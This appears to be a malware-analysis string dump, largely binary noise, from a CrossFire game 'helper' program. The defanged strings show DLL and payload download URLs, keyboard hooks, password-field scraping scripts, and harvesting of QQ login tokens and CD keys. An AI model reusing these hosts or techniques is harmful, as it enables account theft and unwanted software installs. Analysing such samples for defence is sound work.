MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUBMRRWHE[NSWXFWYXZ^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyYTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsivxxz|
8`!%x
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsivxxz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bciJE`ORjYEhYVqNIr\IyZTg^bfaIhdYir_saJwgX|p_fhhkmrnqinrtxjerlszsivxxz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eV]bciJE`ORcOQjYEhYVqNIr\IyZTg^bfaIidYir_saJwgXzq^fhhkmrnqinrtxjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eV]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidYir_saJwgXzr^fhhkmrnqinrtxjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WT<fL.bM;iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
.pQ\ a
.NaH-*
!)!!))!)-*1-(333:73_
%XE%Z
dj%d~
.PXF3
02/24/16
ÏYP
%4u3\2t
W.ctn
XX.ce
{Z,c
.ijWU5
w%SY<s
Wkbn%X
kEYH
&.kPd
(s.PKL
>%fZM
T2%xE
dQ]%U
#.mkTSx
.Ag.~
%f%%f
7".Fv
>.OsM
r.vDO
V2.6.1
\CF_data.ini
hXXp://VVV.baidu.com/
hXXp://blog.163.com/leesin_2017/blog/static/26727603220161118442467/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
.text
`.rdata
@.data
help.dll
\help.dll
@.reloc
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
7.84888<8@8
6 696?6{6
14686<6@6
5 5(50585
? ?$?,?@?`?
>$>0>4>8><>
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGD:\
01/04/17
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
,.Ey)
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
ÿF8>NFFFh
ÿFV
pt_mbkey
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
[SKEY]
"cdkey":"(.*?)"
[%d/d/d d:d]
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
sMsg":"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=6
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=7
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=8
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30827&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30827&tid=


&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=6
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=7
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=8
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=免费枪&vip=0&bangdou=1
%7C322%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?uin=
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一支穿云箭 千军万马来相见。
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://VVV.cfzhushou.com/cfzs/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{
"~ /1~!<
fD.nn'1r?
.KM8'
$&%cw]
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
`.data
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://VVV.cfzhushou.com/app/
hXXp://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://cf.qq.com&style=34
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=3&d=72&v=4&t=0.8120921131107115&daid=8
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?u1=hXXp://cf.qq.com&ptqrtoken=#{ptqrtoken}&ptredirect=1&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=0-1-1491575693107&js_ver=10210&js_type=1&login_sig=#{login_sig}&pt_uistyle=40&aid=21000124&daid=8&has_onekey=1&
#{login_sig}
('0','0','
&js_ver=10210&js_type=1&login_sig=4I5ZCJhgOyvHYIR7edjyKchOesPKbLWadY1YKeoQHyTQu63TEXeJCdU6UZgyOeKv&pt_uistyle=34&aid=549000912&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?u1=hXXps://qzone.qq.com&ptredirect=1&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=0-0-
for(var e=0,i=0,n=t.length;n>i;  i)
e =(e<<5) t.charCodeAt(i);
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://cf.qq.com/comm-htdocs/login/logincallback.htm&style=34
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
o%%co
``PBi %c
<\-M}*0_
{56FDF344-FD6D-11d0-958A-006097C9A090}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
onkeydown|
onkeyup|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
text|password|file
?)-D%f`
location.reload()
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
type=password
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
user.qzone.qq.com
mail.qq.com
onkeyup
type='password'
type="password"
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','
').value="
document.getElementById('
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
window.location.reload()
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
SysShadow.Menu
Microsoft.XMLDOM
HKEY_CURRENT_CONFIG
14:00~16:00
12:00-19:00
1.2.18
%*.*f
MSWHEEL_ROLLMSG
WSOCK32.dll
msscript.ocx
VVV.dywt.com.cn
USER32.DLL
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
its:%s::%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
.PAVCOleException@@
.PAVCOleDispatchException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
GetKeyboardState
InternetCanonicalizeUrlA
:X.xZ
1.0.15.507
T%Program Files%\NamuADLook.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0

%original file name%.exe_4032_rwx_01CC0000_00013000:

.text
`.rdata
@.data
.rsrc
@.reloc
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
<fd:%d>
%c%c%c%c%c%c%c%c%c%c
MSVCRT.dll
KERNEL32.dll
zlib1.dll
!"#$%&'()* ,-./012
DLL support by Alessandro Iacopetti & Gilles Vollant

txservices.exe_760:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
JHw2.Hw
help.dll
\help.dll
@.reloc
HTTP/1.1
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
ShellExecuteA
SHELL32.dll
InternetCrackUrlA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoW
WININET.dll
GetProcessHeap
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
7.84888<8@8
6 696?6{6
14686<6@6
5 5(50585
? ?$?,?@?`?
>$>0>4>8><>
crossfire.exe
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
